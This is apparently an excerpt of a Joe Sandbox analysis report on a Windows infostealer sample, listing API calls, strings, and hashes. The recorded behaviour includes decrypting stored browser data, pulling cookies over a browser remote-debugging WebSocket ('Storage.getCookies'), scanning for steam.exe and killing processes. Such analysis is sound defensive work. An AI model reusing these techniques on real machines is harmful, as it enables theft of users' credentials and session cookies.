                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          APIs
                          • wsprintfA.USER32 ref: 0063E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063E243
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063E263
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063E27D
                          • wsprintfA.USER32 ref: 0063E2A2
                          • StrCmpCA.SHLWAPI(?,0064CFEC), ref: 0063E2B4
                          • wsprintfA.USER32 ref: 0063E2D1
                            • Part of subcall function 0063EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0063EE12
                          • wsprintfA.USER32 ref: 0063E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0063E304
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063E335
                          • lstrcat.KERNEL32(?,00651794), ref: 0063E347
                          • lstrcat.KERNEL32(?,?), ref: 0063E358
                          • lstrcat.KERNEL32(?,00651794), ref: 0063E36A
                          • lstrcat.KERNEL32(?,?), ref: 0063E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E422
                          • DeleteFileA.KERNEL32(?), ref: 0063E45C
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063E49B
                          • FindClose.KERNEL32(00000000), ref: 0063E4AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006216E2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062176C
                          • lstrcat.KERNEL32(00000000), ref: 00621776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 006218F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006218FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0063DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0063DD4C
                          • wsprintfA.USER32 ref: 0063DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063DD79
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063DD9C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063DDB6
                          • wsprintfA.USER32 ref: 0063DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0063DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063DDED
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                            • Part of subcall function 0063D980: memset.MSVCRT ref: 0063D9A1
                            • Part of subcall function 0063D980: memset.MSVCRT ref: 0063D9B3
                            • Part of subcall function 0063D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063D9DB
                            • Part of subcall function 0063D980: lstrcpy.KERNEL32(00000000,?), ref: 0063DA0E
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,00000000), ref: 0063DA1C
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,0129DA98), ref: 0063DA36
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,?), ref: 0063DA4A
                            • Part of subcall function 0063D980: lstrcat.KERNEL32(?,0129CED8), ref: 0063DA5E
                            • Part of subcall function 0063D980: lstrcpy.KERNEL32(00000000,?), ref: 0063DA8E
                            • Part of subcall function 0063D980: GetFileAttributesA.KERNEL32(00000000), ref: 0063DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063DE2E
                          • FindClose.KERNEL32(00000000), ref: 0063DE3D
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063DE66
                          • lstrcat.KERNEL32(?,0129D1A8), ref: 0063DE7A
                          • lstrlen.KERNEL32(?), ref: 0063DE84
                          • lstrlen.KERNEL32(?), ref: 0063DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DED2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          APIs
                          • wsprintfA.USER32 ref: 0063D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063D564
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063D584
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063D59E
                          • lstrcat.KERNEL32(?,0129E488), ref: 0063D5E3
                          • lstrcat.KERNEL32(?,0129E438), ref: 0063D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0063D60B
                          • lstrcat.KERNEL32(?,?), ref: 0063D61C
                          • lstrcat.KERNEL32(?,00651794), ref: 0063D62E
                          • lstrcat.KERNEL32(?,?), ref: 0063D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063D737
                          • FindClose.KERNEL32(00000000), ref: 0063D746
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006323D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006323F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632402
                          • lstrlen.KERNEL32(\*.*), ref: 0063240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00632436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00632486
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: 0-5t$OL[{$OjWj$R{$THd$mdG>$s\}$w-_]$"7$QU
                          • API String ID: 0-1029472912
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: ".nu$/\~z$7?wN$C1_$Pgm$Ww>n$Y)Ov$\z]{$fNM$$#_x
                          • API String ID: 0-117933904
                          • Opcode ID: 80e3b265d87fd48de31e79af90ccdfb68c9595e93e1852de7a5dcf00a96b3b1f
                          • Instruction ID: 20f2107d4729dc7db58aa7f4f5429141a0d775a426ca2a0ef30ffff782f9da71
                          • Opcode Fuzzy Hash: 80e3b265d87fd48de31e79af90ccdfb68c9595e93e1852de7a5dcf00a96b3b1f
                          • Instruction Fuzzy Hash: 5EB219F3A0C2049FE7046E2DEC8567ABBE6EFD4720F1A853DE6C483744EA7558058693
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006446B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 006446C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 006446DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 006446ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00644702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00644711
                          • CloseHandle.KERNEL32(00000000), ref: 00644718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00644726
                          • CloseHandle.KERNEL32(00000000), ref: 00644731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 6dad6fa43c824f49fa19af2be62945c3e7f3cb2f9b8c55d781d0f53fa850589b
                          • Instruction ID: e017c55b18f9fd93e4f7fe282e3a759332d242961c0eebc5db741fbdfa649708
                          • Opcode Fuzzy Hash: 6dad6fa43c824f49fa19af2be62945c3e7f3cb2f9b8c55d781d0f53fa850589b
                          • Instruction Fuzzy Hash: E201D631501314EBE7205B61EC8EFFA377DFB49B12F000089F945E2280EF7899458B60
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00644628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00644638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0064464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00644660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00644672
                          • CloseHandle.KERNEL32(00000000), ref: 0064467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: d1025c3d00dfe12f93950fa115bd96ddbe0e3a2910a2cfd18cd208b28f6ed534
                          • Instruction ID: 2604bb5b1d8a0a5f1e30d9b93ed67868a64cce58998a161172fdf16c7beb8684
                          • Opcode Fuzzy Hash: d1025c3d00dfe12f93950fa115bd96ddbe0e3a2910a2cfd18cd208b28f6ed534
                          • Instruction Fuzzy Hash: 7401A2716012249BD720AB61AC4AFEA77BCFF0D352F0001D5ED48D1180EF7889948BE1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634B7F
                          • lstrlen.KERNEL32(00654CA8), ref: 00634B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BA7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 00634BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00634BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 0a3f3d1e0c6dbe5ba1c1d3afdbcaf47118b68a0e582cf157acfbe3c7a92347b3
                          • Instruction ID: c7b74aaa6d6da2a8fccbcddd730da42643d56c3dbadb2147e1d8556ab41a0225
                          • Opcode Fuzzy Hash: 0a3f3d1e0c6dbe5ba1c1d3afdbcaf47118b68a0e582cf157acfbe3c7a92347b3
                          • Instruction Fuzzy Hash: B8313071511A26ABC762EF25FC96ADEB7A7BF40311F001228F84A97A55DB34EC018F94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q/$4K$AjA$YE`8$`1Uo$ia7}$osO$ha
                          • API String ID: 0-1238677034
                          • Opcode ID: b84bdfc7ce4eb1ea029b2de3e3cabd676260eba1acbd47de4ad275ae5b0617ed
                          • Instruction ID: 1e05bdd263a2a647698eef54739ac766d909bba1c343bae646a1c95b7bd1aa3a
                          • Opcode Fuzzy Hash: b84bdfc7ce4eb1ea029b2de3e3cabd676260eba1acbd47de4ad275ae5b0617ed
                          • Instruction Fuzzy Hash: A3B219F360C2049FE3046E29EC8567AFBE9EFD4720F1A893DE6C4C3744EA3558458696
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00642D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00642DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00642DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00642DEC
                          • LocalFree.KERNEL32(00000000), ref: 00642FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 0fe50bafbf940bd087433e8a926955218015676063c030f32283054b6684479d
                          • Instruction ID: 53efd3685792cb27993dac8fdfc1882866bbbed746ee93c0734713f00aa514ed
                          • Opcode Fuzzy Hash: 0fe50bafbf940bd087433e8a926955218015676063c030f32283054b6684479d
                          • Instruction Fuzzy Hash: C4B10870900615CFC755CF18C948B99BBF2FB44325F69C1A9E4089B3A2D77A9D86CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3Nv$9w~/$;]\$R,e$d;$y6}W
                          • API String ID: 0-3685421311
                          • Opcode ID: 9a8303c24328fa8896c5e8bebbd4b04afee38decfc4a1ca580b8d1eba1960191
                          • Instruction ID: 069c1d0541f57e23d1d030d42028d133f41f3898966aba608dc9807b51c923ce
                          • Opcode Fuzzy Hash: 9a8303c24328fa8896c5e8bebbd4b04afee38decfc4a1ca580b8d1eba1960191
                          • Instruction Fuzzy Hash: 86B228F390C2009FE304AE2DEC9567AFBE9EBD4720F1A893DE6C5C3744EA3558058656
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00642C58
                          • wsprintfA.USER32 ref: 00642C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 5f90ddb4d6881162a565975cee0a245b3e0e7834aa379d142a1c06a9c7b179bb
                          • Instruction ID: c44842177f272e0545f151da4fb6880f3717f7427986f9ce38042a9ad55c02ac
                          • Opcode Fuzzy Hash: 5f90ddb4d6881162a565975cee0a245b3e0e7834aa379d142a1c06a9c7b179bb
                          • Instruction Fuzzy Hash: A201F771A40714EBD7188F58DC49B69B769EB84722F004729F916D73C0D778190486D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "Qr{$"x~m$P9$z(s}$B?e
                          • API String ID: 0-3148019840
                          • Opcode ID: 7d52ad395d01491de1f75ee5e3198cb1ca3c9a1b2031e1fde439ada002d17589
                          • Instruction ID: 642985efc0a062d58f22569419492fd0bc3a6006832e25b4489234658c44228b
                          • Opcode Fuzzy Hash: 7d52ad395d01491de1f75ee5e3198cb1ca3c9a1b2031e1fde439ada002d17589
                          • Instruction Fuzzy Hash: FDB2D4F3A0C6009FE304AE29DC8567ABBE9EF94720F1A493DEAC4C7740E63558458797
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0062778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006277AD
                          • LocalFree.KERNEL32(?), ref: 006277B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: bdc9e14dfef6edac8f7968be1e131abf835c6d3a2c259c52b3afdf9bd864395c
                          • Instruction ID: c53bbbe441ba6833c3c0c253b4fff46b4c35dbceb4d0d730f26d034b58bf5a48
                          • Opcode Fuzzy Hash: bdc9e14dfef6edac8f7968be1e131abf835c6d3a2c259c52b3afdf9bd864395c
                          • Instruction Fuzzy Hash: 14011275B40318BBEB10DB949C4AFAA7B79FB44B16F104555FA09EB2C0D6B499008B90
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00643A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00643AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00643ABF
                            • Part of subcall function 00647310: lstrlen.KERNEL32(------,00625BEB), ref: 0064731B
                            • Part of subcall function 00647310: lstrcpy.KERNEL32(00000000), ref: 0064733F
                            • Part of subcall function 00647310: lstrcat.KERNEL32(?,------), ref: 00647349
                            • Part of subcall function 00647280: lstrcpy.KERNEL32(00000000), ref: 006472AE
                          • CloseHandle.KERNEL32(00000000), ref: 00643BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 3e43a218033b1763301d952f645f7ec06b2ea5725c2f56b69ae74e3632c4e5ea
                          • Instruction ID: 57b1b25e992ce37b6d1959e2f48be0abfde70d3387a5159ae8b949bfb10b70fe
                          • Opcode Fuzzy Hash: 3e43a218033b1763301d952f645f7ec06b2ea5725c2f56b69ae74e3632c4e5ea
                          • Instruction Fuzzy Hash: 4B81F030900725CFD714CF18D988B95BBB2FB54329F29C1A9D4089B3A2D77A9D82CF84
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0062EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0062EA7E
                          • lstrcat.KERNEL32(0064CFEC,0064CFEC), ref: 0062EB27
                          • lstrcat.KERNEL32(0064CFEC,0064CFEC), ref: 0062EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: aa4c24267b36e25d3f800fc4923402310c9a739ff259a9e148e51ff6cc238ac6
                          • Instruction ID: e1ac387091cc794cddfa00482d3390339753f3e9af357e65d98fc87a8193d730
                          • Opcode Fuzzy Hash: aa4c24267b36e25d3f800fc4923402310c9a739ff259a9e148e51ff6cc238ac6
                          • Instruction Fuzzy Hash: A531D575A00219ABDB10DB98EC46FEEB77EEF44716F044175F909E3280DBB55A08CBA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006440CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006440DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006440E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00644113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: a660d0a42391bd1a2c77c54837d5d57de32d0f23bc32be2da99872e5663cb0c8
                          • Instruction ID: 860b336d51f66dc3c2ce1fac30e43e446ede287518a4a318ef25edb30c1ee69f
                          • Opcode Fuzzy Hash: a660d0a42391bd1a2c77c54837d5d57de32d0f23bc32be2da99872e5663cb0c8
                          • Instruction Fuzzy Hash: BE015A70600205ABDB108FA5DC8ABAABBAEEF84712F108059FE0897340DA719950CBA0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0064A3D0,000000FF), ref: 00642B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00642B96
